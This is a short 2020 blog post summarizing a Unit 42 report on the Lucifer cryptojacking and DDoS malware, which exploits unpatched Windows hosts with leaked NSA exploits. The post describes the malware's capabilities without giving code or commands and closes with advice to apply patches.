Monday, June 29, 2020

Lucifer malware also mines Monero cryptocurrency on infected devices ,also has ability todrop/run leaked NSA(National security agency,USA's national intelligence level) exploits including DoublePulsar, EternalBlue, and EternalRomance against vulnerable devices to enable intranet infection.

Palo Alto Networks’ Units 42 researchers have discovered a new version of a “hybrid crypto-jacking malware,” which they have dubbed “Lucifer.”
Lucifer malware is capable of launching DDoS attacks and can attack vulnerable Windows hosts using a variety of “trivial-to-exploit nature” flaws most of which are either rated ‘high’ or ‘critical.’
The first wave of this campaign was blocked by Palo Alto Networks on 10 June 2020, but the attacker resumed the campaign the very next day with an upgraded version of Lucifer malware. The campaign is still active and wreaking havoc by targeting Windows computers to mine for cryptocurrency and launching intense DDoS attacks.
Palo Alto Networks’ researchers observed that the new variant of Lucifer is immensely powerful as it performs crypto-jacking by dropping XMRig to mine for Monero cryptocurrency , connect to C&C server and enable self-propagation via exploiting multiple vulnerabilities along with launching credential brute-forcing.
Furthermore, it can drop/run leaked NSA exploits including DoublePulsar, EternalBlue, and EternalRomance against vulnerable devices to enable intranet infection.
“Once exploited, the attacker can execute arbitrary commands on the vulnerable device. In this case, the targets are Windows hosts on both the internet and intranet, given that the attacker is leveraging certutil utility in the payload for malware propagation” said on the researchers in a blog post . "


NSA exploits in action:

The malware developer named it Satan DDoS but since Satan Ransomware exists already, Palo Alto researchers chose to name it as Lucifer.
The good thing is that patches for weaponized security vulnerabilities are already available but hosts that haven’t been updated yet are still vulnerable to crypto-jacking. Researchers urge users to immediately apply the latest patches and updates to secure their devices.

No comments:

Post a Comment

Who is private Hakizimana Iradukunda Jean De Dien a Rwandan soldier captured in Lubero

He is Private 1st class HAKIZIMANA IRADUKUNDA JEAN DE DIEU  Born in RWANDA, February 22, 2002, Son of Mr. HAKIZIMANA AMZA and Mrs. KABANYANA...